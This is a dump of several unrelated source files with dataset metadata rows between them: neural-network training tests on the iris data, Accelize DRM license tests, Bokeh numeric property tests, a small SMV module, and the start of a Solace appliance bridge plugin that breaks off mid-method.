|
[
"MIT"
] | null | null | null |
# import matplotlib.pyplot as plt
# from nnreslib.utils.metrics import OpMode
import numpy as np
import tensorflow as tf
from nnreslib.architecture import ArchitectureType
from nnreslib.layers import FullyConnectedLayer, InputLayer
from nnreslib.model import Model
from nnreslib.utils.types import ActivationFunctions, Shape
def test_iris_net_lm():
    """Train the 4-5-6-3 iris net with LevenbergMarquardt and check it
    converges strictly before the epoch budget under the 0.05 loss target."""
    tf.compat.v1.reset_default_graph()
    np.random.seed(42)
    data = np.load("./tests/data/iris.npy")
    np.random.shuffle(data)

    def one_hot(rows):
        # 3-class one-hot encoding of the label column, as float64.
        return np.eye(3)[rows[:150, -1].reshape((-1)).astype(int)].astype(np.float64)

    x_train = data[:150, :-1]
    y_train = one_hot(data)
    x_validation = data[:150, :-1]
    y_validation = one_hot(data)
    architecture: ArchitectureType = [
        InputLayer("input", Shape(4)),
        FullyConnectedLayer("fc_1", neurons=5),
        FullyConnectedLayer("fc_2", neurons=6),
        FullyConnectedLayer("fc_3", neurons=3, activation=ActivationFunctions.SOFTMAX, is_out=True),
    ]
    model = Model(150, architecture)
    epoch, loss = model.train(
        "LevenbergMarquardt",
        x_train,
        y_train,
        x_validation,
        y_validation,
        200,
        0.05,
        step_into_epoch=10,
        regularisation_factor_init=5.0,
        regularisation_factor_decay=10.0,
        regularisation_factor_increase=10.0,
        percent_random=0.2,
    )
    assert epoch < 200
    assert loss < 0.05
def test_iris_net_adam():
    """Train the 4-5-6-3 iris net with Adam and check it reaches the 0.1
    loss target within the epoch budget."""
    tf.compat.v1.reset_default_graph()
    np.random.seed(42)
    data = np.load("./tests/data/iris.npy")
    np.random.shuffle(data)

    def one_hot(rows):
        # 3-class one-hot encoding of the label column, as float64.
        return np.eye(3)[rows[:150, -1].reshape((-1)).astype(int)].astype(np.float64)

    x_train = data[:150, :-1]
    y_train = one_hot(data)
    x_validation = data[:150, :-1]
    y_validation = one_hot(data)
    architecture: ArchitectureType = [
        InputLayer("input", Shape(4)),
        FullyConnectedLayer("fc_1", neurons=5),
        FullyConnectedLayer("fc_2", neurons=6),
        FullyConnectedLayer("fc_3", neurons=3, activation=ActivationFunctions.SOFTMAX, is_out=True),
    ]
    model = Model(150, architecture)
    epoch, loss = model.train(
        "Adam", x_train, y_train, x_validation, y_validation, 200, 0.1, learning_rate=0.01, logging_step=10
    )
    assert epoch <= 200
    assert loss < 0.1
def test_iris_net_adadelta():
    """Train the 4-5-6-3 iris net with Adadelta and check it reaches the 0.1
    loss target within the epoch budget."""
    tf.compat.v1.reset_default_graph()
    np.random.seed(42)
    data = np.load("./tests/data/iris.npy")
    np.random.shuffle(data)

    def one_hot(rows):
        # 3-class one-hot encoding of the label column, as float64.
        return np.eye(3)[rows[:150, -1].reshape((-1)).astype(int)].astype(np.float64)

    x_train = data[:150, :-1]
    y_train = one_hot(data)
    x_validation = data[:150, :-1]
    y_validation = one_hot(data)
    architecture: ArchitectureType = [
        InputLayer("input", Shape(4)),
        FullyConnectedLayer("fc_1", neurons=5),
        FullyConnectedLayer("fc_2", neurons=6),
        FullyConnectedLayer("fc_3", neurons=3, activation=ActivationFunctions.SOFTMAX, is_out=True),
    ]
    model = Model(150, architecture)
    epoch, loss = model.train(
        "Adadelta",
        x_train,
        y_train,
        x_validation,
        y_validation,
        200,
        0.1,
        learning_rate=30.0,
        logging_step=10,
    )
    assert epoch <= 200
    assert loss < 0.1
def test_iris_net_adagrad():
    """Train the 4-5-6-3 iris net with Adagrad and check it reaches the 0.1
    loss target within the epoch budget."""
    tf.compat.v1.reset_default_graph()
    np.random.seed(42)
    data = np.load("./tests/data/iris.npy")
    np.random.shuffle(data)

    def one_hot(rows):
        # 3-class one-hot encoding of the label column, as float64.
        return np.eye(3)[rows[:150, -1].reshape((-1)).astype(int)].astype(np.float64)

    x_train = data[:150, :-1]
    y_train = one_hot(data)
    x_validation = data[:150, :-1]
    y_validation = one_hot(data)
    architecture: ArchitectureType = [
        InputLayer("input", Shape(4)),
        FullyConnectedLayer("fc_1", neurons=5),
        FullyConnectedLayer("fc_2", neurons=6),
        FullyConnectedLayer("fc_3", neurons=3, activation=ActivationFunctions.SOFTMAX, is_out=True),
    ]
    model = Model(150, architecture)
    epoch, loss = model.train(
        "Adagrad",
        x_train,
        y_train,
        x_validation,
        y_validation,
        200,
        0.1,
        learning_rate=1.0,
        logging_step=10,
    )
    assert epoch <= 200
    assert loss < 0.1
def test_iris_net_rmsprop():
    """Train the 4-5-6-3 iris net with RMSProp and check it reaches the 0.1
    loss target within the epoch budget."""
    tf.compat.v1.reset_default_graph()
    np.random.seed(42)
    data = np.load("./tests/data/iris.npy")
    np.random.shuffle(data)

    def one_hot(rows):
        # 3-class one-hot encoding of the label column, as float64.
        return np.eye(3)[rows[:150, -1].reshape((-1)).astype(int)].astype(np.float64)

    x_train = data[:150, :-1]
    y_train = one_hot(data)
    x_validation = data[:150, :-1]
    y_validation = one_hot(data)
    architecture: ArchitectureType = [
        InputLayer("input", Shape(4)),
        FullyConnectedLayer("fc_1", neurons=5),
        FullyConnectedLayer("fc_2", neurons=6),
        FullyConnectedLayer("fc_3", neurons=3, activation=ActivationFunctions.SOFTMAX, is_out=True),
    ]
    model = Model(150, architecture)
    epoch, loss = model.train(
        "RMSProp",
        x_train,
        y_train,
        x_validation,
        y_validation,
        200,
        0.1,
        learning_rate=0.1,
        logging_step=10,
    )
    assert epoch <= 200
    assert loss < 0.1
def test_iris_net_momentum():
    """Train the 4-5-6-3 iris net with Momentum and check it reaches the 0.1
    loss target within the epoch budget."""
    tf.compat.v1.reset_default_graph()
    np.random.seed(42)
    data = np.load("./tests/data/iris.npy")
    np.random.shuffle(data)

    def one_hot(rows):
        # 3-class one-hot encoding of the label column, as float64.
        return np.eye(3)[rows[:150, -1].reshape((-1)).astype(int)].astype(np.float64)

    x_train = data[:150, :-1]
    y_train = one_hot(data)
    x_validation = data[:150, :-1]
    y_validation = one_hot(data)
    architecture: ArchitectureType = [
        InputLayer("input", Shape(4)),
        FullyConnectedLayer("fc_1", neurons=5),
        FullyConnectedLayer("fc_2", neurons=6),
        FullyConnectedLayer("fc_3", neurons=3, activation=ActivationFunctions.SOFTMAX, is_out=True),
    ]
    model = Model(150, architecture)
    epoch, loss = model.train(
        "Momentum",
        x_train,
        y_train,
        x_validation,
        y_validation,
        200,
        0.1,
        learning_rate=5.0,
        logging_step=10,
    )
    assert epoch <= 200
    assert loss < 0.1
def test_iris_net_sgd():
    """Train the 4-5-6-3 iris net with SGD and check it reaches the 0.1
    loss target within the epoch budget."""
    tf.compat.v1.reset_default_graph()
    np.random.seed(42)
    data = np.load("./tests/data/iris.npy")
    np.random.shuffle(data)

    def one_hot(rows):
        # 3-class one-hot encoding of the label column, as float64.
        return np.eye(3)[rows[:150, -1].reshape((-1)).astype(int)].astype(np.float64)

    x_train = data[:150, :-1]
    y_train = one_hot(data)
    x_validation = data[:150, :-1]
    y_validation = one_hot(data)
    architecture: ArchitectureType = [
        InputLayer("input", Shape(4)),
        FullyConnectedLayer("fc_1", neurons=5),
        FullyConnectedLayer("fc_2", neurons=6),
        FullyConnectedLayer("fc_3", neurons=3, activation=ActivationFunctions.SOFTMAX, is_out=True),
    ]
    model = Model(150, architecture)
    epoch, loss = model.train(
        "SGD",
        x_train,
        y_train,
        x_validation,
        y_validation,
        200,
        0.1,
        learning_rate=5.0,
        logging_step=10,
    )
    assert epoch <= 200
    assert loss < 0.1
# assert np.array_equal(model.predict(x_train)[0], np.array([1, 0, 0]))
# Only for interactive testing
# plt.plot(model.metrics.results[OpMode.TRAIN]["MSE"], label="Train MSE")
# plt.plot(model.metrics.results[OpMode.TRAIN]["RMSE"], label="Train RMSE")
# plt.plot(model.metrics.results[OpMode.TRAIN]["MAE"], label="Train MAE")
# plt.plot(model.metrics.results[OpMode.TRAIN]["CCE"], label="Train CCE")
# plt.plot(model.metrics.results[OpMode.VALID]["MSE"], label="Valid MSE")
# plt.plot(model.metrics.results[OpMode.VALID]["RMSE"], label="Valid RMSE")
# plt.plot(model.metrics.results[OpMode.VALID]["MAE"], label="Valid MAE")
# plt.plot(model.metrics.results[OpMode.VALID]["CCE"], label="Train CCE")
# plt.legend()
# plt.show()
| 27.722222
| 107
| 0.595898
| 1,057
| 8,483
| 4.648061
| 0.103122
| 0.039894
| 0.045593
| 0.025646
| 0.85976
| 0.852636
| 0.847547
| 0.783228
| 0.783228
| 0.783228
| 0
| 0.058944
| 0.254037
| 8,483
| 305
| 108
| 27.813115
| 0.717446
| 0.091477
| 0
| 0.811715
| 0
| 0
| 0.041732
| 0.019111
| 0
| 0
| 0
| 0
| 0.058577
| 1
| 0.029289
| false
| 0
| 0.025105
| 0
| 0.054393
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d21a52c0f81c6235782ad5477881d6625a11c797
| 164
|
py
|
Python
|
instruction/field/__init__.py
|
HansGR/WorldsCollide
|
af227be553e120ee004b130598360c61daf7df59
|
[
"MIT"
] | 7
|
2022-01-15T02:53:53.000Z
|
2022-02-17T00:51:32.000Z
|
instruction/field/__init__.py
|
HansGR/WorldsCollide
|
af227be553e120ee004b130598360c61daf7df59
|
[
"MIT"
] | 8
|
2022-01-16T02:45:24.000Z
|
2022-03-21T02:08:27.000Z
|
instruction/field/__init__.py
|
HansGR/WorldsCollide
|
af227be553e120ee004b130598360c61daf7df59
|
[
"MIT"
] | 5
|
2022-01-15T02:53:38.000Z
|
2022-01-19T17:42:10.000Z
|
from instruction.field.instructions import *
from instruction.field.functions import *
from instruction.field.custom import *
from instruction.field.y_npc import *
| 32.8
| 44
| 0.829268
| 21
| 164
| 6.428571
| 0.428571
| 0.444444
| 0.592593
| 0.577778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 164
| 4
| 45
| 41
| 0.912162
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d22e5c4318ee7ef3799f51b440d0f169631ff64e
| 5,844
|
py
|
Python
|
tests/test_drm_license_error.py
|
Accelize/drm
|
081ef761de50b526523b692c3a8decf290714ed0
|
[
"Apache-2.0"
] | 4
|
2021-02-21T09:11:50.000Z
|
2021-11-29T02:34:07.000Z
|
tests/test_drm_license_error.py
|
Accelize/drm
|
081ef761de50b526523b692c3a8decf290714ed0
|
[
"Apache-2.0"
] | null | null | null |
tests/test_drm_license_error.py
|
Accelize/drm
|
081ef761de50b526523b692c3a8decf290714ed0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Test metering and floating behaviors of DRM Library.
"""
import pytest
from time import sleep
from random import randint
from datetime import datetime, timedelta
from re import search
from json import loads, dumps
from flask import request as _request
from requests import get, post
from tests.proxy import get_context, set_context
@pytest.mark.skip(reason='Waiting a fix from LGDN')
@pytest.mark.no_parallel
def test_header_error_on_key(accelize_drm, conf_json, cred_json, async_handler,
                             live_server, request):
    """
    Test a MAC error is returned if the key value in the response has been modified
    """
    driver = accelize_drm.pytest_fpga_driver[0]
    # Program FPGA with latest HDK per major number
    image_id = driver.fpga_image
    driver.program_fpga(image_id)
    async_cb = async_handler.create()
    async_cb.reset()
    conf_json.reset()
    # Point the DRM library at the proxy endpoint dedicated to this test
    # (the test function name selects the server-side behavior).
    conf_json['licensing']['url'] = _request.url + request.function.__name__
    conf_json.save()
    with accelize_drm.DrmManager(
            conf_json.path, cred_json.path,
            driver.read_register_callback,
            driver.write_register_callback,
            async_cb.callback
    ) as drm_manager:
        # Set initial context on the live server
        context = {'cnt':0}
        set_context(context)
        assert get_context() == context
        # Check failure is detected: activation must fail the header check.
        with pytest.raises(accelize_drm.exceptions.DRMCtlrError) as excinfo:
            drm_manager.activate()
        assert async_handler.get_error_code(str(excinfo.value)) == accelize_drm.exceptions.DRMCtlrError.error_code
        assert "License header check error" in str(excinfo.value)
    # No asynchronous error should have been reported alongside.
    async_cb.assert_NoError()
@pytest.mark.no_parallel
def test_header_error_on_licenseTimer(accelize_drm, conf_json, cred_json, async_handler,
                                      live_server, request):
    """
    Test a MAC error is returned if the licenseTimer value in the response has been modified
    """
    driver = accelize_drm.pytest_fpga_driver[0]
    # Program FPGA with latest HDK per major number
    image_id = driver.fpga_image
    driver.program_fpga(image_id)
    async_cb = async_handler.create()
    async_cb.reset()
    activators = accelize_drm.pytest_fpga_activators[0]
    activators.reset_coin()
    activators.autotest()
    conf_json.reset()
    # Point the DRM library at the proxy endpoint dedicated to this test.
    conf_json['licensing']['url'] = _request.url + request.function.__name__
    conf_json.save()
    with accelize_drm.DrmManager(
            conf_json.path, cred_json.path,
            driver.read_register_callback,
            driver.write_register_callback,
            async_cb.callback
    ) as drm_manager:
        # Set initial context on the live server
        context = {'cnt':0}
        set_context(context)
        assert get_context() == context
        drm_manager.activate()
        start = datetime.now()
        lic_duration = drm_manager.get('license_duration')
        assert drm_manager.get('license_status')
        activators.autotest(is_activated=True)
        # Wait past the first license period (+2s margin) so the renewal
        # response, whose licenseTimer was tampered with, gets processed.
        wait_period = start + timedelta(seconds=lic_duration+2) - datetime.now()
        sleep(wait_period.total_seconds())
        assert not drm_manager.get('license_status')
        activators.autotest(is_activated=False)
        # NOTE(review): autotest(is_activated=False) is called twice in a
        # row — confirm the repetition is intentional.
        activators.autotest(is_activated=False)
        # The failure must have been reported through the async callback.
        assert async_cb.was_called
        assert async_cb.message is not None
        assert async_cb.errcode == accelize_drm.exceptions.DRMCtlrError.error_code
        assert "License header check error" in async_cb.message
@pytest.mark.no_parallel
def test_session_id_error(accelize_drm, conf_json, cred_json, async_handler,
                          live_server, request):
    """
    Test an error is returned if a wrong session id is provided
    """
    driver = accelize_drm.pytest_fpga_driver[0]
    async_cb = async_handler.create()
    async_cb.reset()
    activators = accelize_drm.pytest_fpga_activators[0]
    activators.reset_coin()
    activators.autotest()
    conf_json.reset()
    # Point the DRM library at the proxy endpoint dedicated to this test.
    conf_json['licensing']['url'] = _request.url + request.function.__name__
    conf_json.save()
    with accelize_drm.DrmManager(
            conf_json.path, cred_json.path,
            driver.read_register_callback,
            driver.write_register_callback,
            async_cb.callback
    ) as drm_manager:
        # Set initial context on the live server
        context = {'session_id':'0', 'session_cnt':0, 'request_cnt':0}
        set_context(context)
        assert get_context() == context
        # Start session #1 to record
        drm_manager.activate()
        start = datetime.now()
        assert drm_manager.get('license_status')
        activators.autotest(is_activated=True)
        lic_duration = drm_manager.get('license_duration')
        # Let one full license period (+2s margin) elapse within session #1.
        wait_period = start + timedelta(seconds=lic_duration+2) - datetime.now()
        sleep(wait_period.total_seconds())
        assert drm_manager.get('license_status')
        drm_manager.deactivate()
        assert not drm_manager.get('license_status')
        activators.autotest(is_activated=False)
        # Session #1 must have ended cleanly before the replay attempt.
        async_cb.assert_NoError()
        # Start session #2 to replay session #1
        drm_manager.activate()
        start = datetime.now()
        assert drm_manager.get('license_status')
        activators.autotest(is_activated=True)
        lic_duration = drm_manager.get('license_duration')
        wait_period = start + timedelta(seconds=lic_duration+2) - datetime.now()
        sleep(wait_period.total_seconds())
        # The replayed session id must have been rejected: license dropped.
        assert not drm_manager.get('license_status')
        activators.autotest(is_activated=False)
        drm_manager.deactivate()
        # The failure must have been reported through the async callback.
        assert async_cb.was_called
        assert async_cb.message is not None
        assert async_cb.errcode == accelize_drm.exceptions.DRMCtlrError.error_code
        assert "License header check error" in async_cb.message
| 36.074074
| 114
| 0.691478
| 741
| 5,844
| 5.186235
| 0.190283
| 0.034608
| 0.033828
| 0.052043
| 0.811606
| 0.802758
| 0.78012
| 0.761124
| 0.761124
| 0.728858
| 0
| 0.003742
| 0.222621
| 5,844
| 161
| 115
| 36.298137
| 0.842175
| 0.103183
| 0
| 0.857143
| 0
| 0
| 0.062198
| 0
| 0
| 0
| 0
| 0
| 0.184874
| 1
| 0.02521
| false
| 0
| 0.07563
| 0
| 0.10084
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96bc7368532d2026d8b8f9e150620f5478823fd8
| 9,241
|
py
|
Python
|
tests/unit/bokeh/core/property/test_numeric.py
|
jeisch/bokeh
|
6be4d5ebbec04117f2bb0693fe64dc664f8f1bb1
|
[
"BSD-3-Clause"
] | 1
|
2020-03-21T04:11:51.000Z
|
2020-03-21T04:11:51.000Z
|
tests/unit/bokeh/core/property/test_numeric.py
|
jeisch/bokeh
|
6be4d5ebbec04117f2bb0693fe64dc664f8f1bb1
|
[
"BSD-3-Clause"
] | 2
|
2021-05-08T11:43:21.000Z
|
2021-05-10T19:16:43.000Z
|
tests/unit/bokeh/core/property/test_numeric.py
|
jeisch/bokeh
|
6be4d5ebbec04117f2bb0693fe64dc664f8f1bb1
|
[
"BSD-3-Clause"
] | null | null | null |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
from _util_property import _TestHasProps, _TestModel
from bokeh.core.properties import Float, Int
from bokeh._testing.util.api import verify_all
# Module under test
import bokeh.core.property.numeric as bcpn
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
# Expected public exports of bokeh.core.property.numeric; checked against the
# module at the bottom of the file via verify_all (order matches the module).
ALL = (
    'Angle',
    'Byte',
    'Interval',
    'NonNegativeInt',
    'Percent',
    'PositiveInt',
    'Size',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class Test_Angle(object):
    """Exercise the bcpn.Angle property type."""

    def test_valid(self):
        prop = bcpn.Angle()
        assert prop.is_valid(None)
        # TODO (bev) bools should arguably fail, but bool subclasses int
        for value in (False, True, 0, 1, 0.0, 1.0):
            assert prop.is_valid(value)

    def test_invalid(self):
        prop = bcpn.Angle()
        for value in (1.0+1.0j, "", (), [], {}, _TestHasProps(), _TestModel()):
            assert not prop.is_valid(value)

    def test_has_ref(self):
        # Angle is a plain scalar property; it never references models
        assert not bcpn.Angle().has_ref

    def test_str(self):
        assert str(bcpn.Angle()) == "Angle"
class Test_Interval(object):
    """Exercise the bcpn.Interval property type."""

    def test_init(self):
        # interval type and bounds are mandatory
        with pytest.raises(TypeError):
            bcpn.Interval()
        # bounds must agree with the declared interval type
        with pytest.raises(ValueError):
            bcpn.Interval(Int, 0.0, 1.0)

    def test_valid_int(self):
        prop = bcpn.Interval(Int, 0, 255)
        assert prop.is_valid(None)
        # TODO (bev) bools should arguably fail, but bool subclasses int
        for value in (False, True, 0, 1, 127):
            assert prop.is_valid(value)

    def test_invalid_int(self):
        prop = bcpn.Interval(Int, 0, 255)
        wrong_type = (0.0, 1.0, 1.0+1.0j, "", (), [], {}, _TestHasProps(), _TestModel())
        out_of_range = (-1, 256)
        for value in wrong_type + out_of_range:
            assert not prop.is_valid(value)

    def test_valid_float(self):
        prop = bcpn.Interval(Float, 0.0, 1.0)
        assert prop.is_valid(None)
        # TODO (bev) bools should arguably fail, but bool subclasses int
        for value in (False, True, 0, 1, 0.0, 1.0, 0.5):
            assert prop.is_valid(value)

    def test_invalid_float(self):
        prop = bcpn.Interval(Float, 0.0, 1.0)
        for value in (1.0+1.0j, "", (), [], {}, _TestHasProps(), _TestModel(),
                      -0.001, 1.001):
            assert not prop.is_valid(value)

    def test_has_ref(self):
        assert not bcpn.Interval(Float, 0.0, 1.0).has_ref

    def test_str(self):
        assert str(bcpn.Interval(Float, 0.0, 1.0)) == "Interval(Float, 0.0, 1.0)"
class Test_Size(object):
    """Exercise the bcpn.Size property type (non-negative numbers)."""

    def test_valid(self):
        prop = bcpn.Size()
        assert prop.is_valid(None)
        # TODO (bev) bools should arguably fail, but bool subclasses int
        for value in (False, True, 0, 1, 0.0, 1.0, 100, 100.1):
            assert prop.is_valid(value)

    def test_invalid(self):
        prop = bcpn.Size()
        for value in (1.0+1.0j, "", (), [], {}, _TestHasProps(), _TestModel(),
                      -100, -0.001):
            assert not prop.is_valid(value)

    def test_has_ref(self):
        assert not bcpn.Size().has_ref

    def test_str(self):
        assert str(bcpn.Size()) == "Size"
class Test_Percent(object):
    """Exercise the bcpn.Percent property type (values in [0, 1])."""

    def test_valid(self):
        prop = bcpn.Percent()
        assert prop.is_valid(None)
        # TODO (bev) bools should arguably fail, but bool subclasses int
        for value in (False, True, 0, 1, 0.0, 1.0, 0.5):
            assert prop.is_valid(value)

    def test_invalid(self):
        prop = bcpn.Percent()
        for value in (1.0+1.0j, "", (), [], {}, _TestHasProps(), _TestModel(),
                      -0.001, 1.001):
            assert not prop.is_valid(value)

    def test_has_ref(self):
        assert not bcpn.Percent().has_ref

    def test_str(self):
        assert str(bcpn.Percent()) == "Percent"
class Test_NonNegativeInt(object):
    """Exercise the bcpn.NonNegativeInt property type (ints >= 0)."""

    def test_valid(self):
        prop = bcpn.NonNegativeInt()
        assert prop.is_valid(None)
        # TODO (bev) bools should arguably fail, but bool subclasses int
        for value in (False, True, 0, 1, 2, 100):
            assert prop.is_valid(value)

    def test_invalid(self):
        prop = bcpn.NonNegativeInt()
        for value in (-1, 0.0, 1.0, 1.0+1.0j, "", (), [], {},
                      _TestHasProps(), _TestModel(), -100, -0.001):
            assert not prop.is_valid(value)

    def test_has_ref(self):
        assert not bcpn.NonNegativeInt().has_ref

    def test_str(self):
        assert str(bcpn.NonNegativeInt()) == "NonNegativeInt"
class Test_PositiveInt(object):
    """Exercise the bcpn.PositiveInt property type (ints > 0)."""

    def test_valid(self):
        prop = bcpn.PositiveInt()
        assert prop.is_valid(None)
        # TODO (bev) True should arguably fail, but bool subclasses int
        for value in (True, 1, 2, 100):
            assert prop.is_valid(value)

    def test_invalid(self):
        prop = bcpn.PositiveInt()
        # zero and False are rejected along with negatives and non-ints
        for value in (False, -1, 0, 0.0, 1.0, 1.0+1.0j, "", (), [], {},
                      _TestHasProps(), _TestModel(), -100, -0.001):
            assert not prop.is_valid(value)

    def test_has_ref(self):
        assert not bcpn.PositiveInt().has_ref

    def test_str(self):
        assert str(bcpn.PositiveInt()) == "PositiveInt"
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
# Generated test: assert the module's public API is exactly the names in ALL.
Test___all__ = verify_all(bcpn, ALL)
| 27.834337
| 78
| 0.525592
| 1,133
| 9,241
| 4.113857
| 0.082083
| 0.155761
| 0.285561
| 0.228492
| 0.821927
| 0.790388
| 0.780734
| 0.715083
| 0.715083
| 0.701352
| 0
| 0.025057
| 0.244238
| 9,241
| 331
| 79
| 27.918429
| 0.642325
| 0.183422
| 0
| 0.805687
| 0
| 0
| 0.01585
| 0
| 0
| 0
| 0
| 0.003021
| 0.630332
| 1
| 0.127962
| false
| 0
| 0.023697
| 0
| 0.180095
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
738411cd5f30c3d6bc607ae9f0811f3682159406
| 245
|
py
|
Python
|
tools/templates/test/src/main/python/test6/modules.py
|
fanqingbo/smv
|
7fdcc63fee36a3a44562594a96e9e69bf9aa51b7
|
[
"Apache-2.0"
] | null | null | null |
tools/templates/test/src/main/python/test6/modules.py
|
fanqingbo/smv
|
7fdcc63fee36a3a44562594a96e9e69bf9aa51b7
|
[
"Apache-2.0"
] | null | null | null |
tools/templates/test/src/main/python/test6/modules.py
|
fanqingbo/smv
|
7fdcc63fee36a3a44562594a96e9e69bf9aa51b7
|
[
"Apache-2.0"
] | null | null | null |
from smv import *
class M2(SmvPyModule, SmvPyOutput):
    """Output module that passes through the upstream external dataset M1."""

    def requiresDS(self):
        # Single upstream dependency: the external dataset M1 of test6.
        upstream = SmvPyExtDataSet("org.tresamigos.smvtest.test6.M1")
        return [upstream]

    def run(self, i):
        # `i` maps each required dataset to its resolved DataFrame.
        key = SmvPyExtDataSet("org.tresamigos.smvtest.test6.M1")
        return i[key]
| 27.222222
| 70
| 0.681633
| 29
| 245
| 5.758621
| 0.655172
| 0.215569
| 0.335329
| 0.419162
| 0.502994
| 0.502994
| 0
| 0
| 0
| 0
| 0
| 0.025126
| 0.187755
| 245
| 8
| 71
| 30.625
| 0.81407
| 0
| 0
| 0
| 0
| 0
| 0.253061
| 0.253061
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
73f6430a598cf838e8116ea5f9abb6619ba107a8
| 21,226
|
py
|
Python
|
libsolace/items/SolaceBridge.py
|
ExalDraen/python-libsolace
|
76abd2ac8b9f2c579fa9c23ae0c988ce001fabaf
|
[
"MIT"
] | null | null | null |
libsolace/items/SolaceBridge.py
|
ExalDraen/python-libsolace
|
76abd2ac8b9f2c579fa9c23ae0c988ce001fabaf
|
[
"MIT"
] | null | null | null |
libsolace/items/SolaceBridge.py
|
ExalDraen/python-libsolace
|
76abd2ac8b9f2c579fa9c23ae0c988ce001fabaf
|
[
"MIT"
] | 2
|
2019-09-06T23:47:35.000Z
|
2020-09-14T10:06:07.000Z
|
import logging
import libsolace
from libsolace import Plugin
from libsolace.SolaceAPI import SolaceAPI
from libsolace.SolaceCommandQueue import SolaceCommandQueue
from libsolace.SolaceXMLBuilder import SolaceXMLBuilder
from libsolace.items.SolaceQueue import SolaceQueue
# Module-level logger; NullHandler keeps library imports from emitting
# "no handlers could be found" warnings when the app configures no logging.
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
@libsolace.plugin_registry.register
class SolaceBridge(Plugin):
    """ Construct a bridge between two appliance clusters to link specific VPN's. This Plugin is still being developed,
    and is NOT ready for production.

    All work is done by appending SEMP commands (built with SolaceXMLBuilder)
    onto the command queues of the two SolaceAPI sessions; nothing is applied
    here directly.

    NOTE: bare attribute accesses such as ``api.x.bridge.primary`` are
    presumably side-effecting (the builder materialises empty XML nodes on
    attribute access) -- verify against SolaceXMLBuilder before "cleaning
    them up".
    """

    def __init__(self, testmode=True, shutdown_on_apply=False, options=None, version=None, **kwargs):
        """ Init user object

        Builds, for every requested VPN, a pair of bridges (one per cluster),
        their remotes, credentials, queues, and finally enables everything.

        :type testmode: boolean
        :type shutdown_on_apply: boolean
        :type options: OptionParser
        :type version: string
        """
        logger.debug("options: %s" % options)
        self.cq = SolaceCommandQueue(version=version)
        # One API session per appliance cluster being bridged.
        self.primaryCluster = SolaceAPI(options.primary, testmode=testmode, version=version)
        self.drCluster = SolaceAPI(options.backup, testmode=testmode, version=version)
        self.vpns = []
        for vpn in options.vpns:
            try:
                # Substitute the environment name into templated VPN names.
                self.vpns.append(vpn % options.environment)
            except Exception, e:
                # Name has no format placeholder; use it verbatim.
                self.vpns.append(vpn)
        for vpn in self.vpns:
            try:
                # NOTE(review): entries in self.vpns were already substituted
                # above, so this second substitution normally raises and the
                # fallback below is taken -- confirm this is intended.
                bridgeName = vpn % options.environment
            except Exception, e:
                bridgeName = vpn
            logger.info("Creating Bridge: %s" % bridgeName)
            primaryBridgeName = "%s_%s" % ("primary", bridgeName)
            backupBridgeName = "%s_%s" % ("backup", bridgeName)
            logger.info("Primary Bridge Name: %s" % primaryBridgeName)
            logger.info("Backup Bridge Name: %s" % backupBridgeName)
            # create bridge on primary cluster
            self._create_bridge(self.primaryCluster, primaryBridgeName, vpn,
                                version=version)
            # create bridge on the DR cluster
            self._create_bridge(self.drCluster, backupBridgeName, vpn,
                                version=version)
            # create remote on primary cluster bridge
            self._create_bridge_remote_addr(self.primaryCluster, primaryBridgeName, vpn,
                                            options.backup_addr, options.primary_phys_intf, version=version)
            # create reverse remote on dr cluster bridge
            self._create_bridge_remote_vrouter(self.drCluster, backupBridgeName, vpn,
                                               options.primary_cluster_primary_node_name, version=version)
            # create remote username on primary cluster bridge
            self._bridge_username_addr(self.primaryCluster, primaryBridgeName, vpn,
                                       options.backup_addr, options.primary_phys_intf, options.username,
                                       options.password, version=version)
            # create remote username on backup cluster bridge
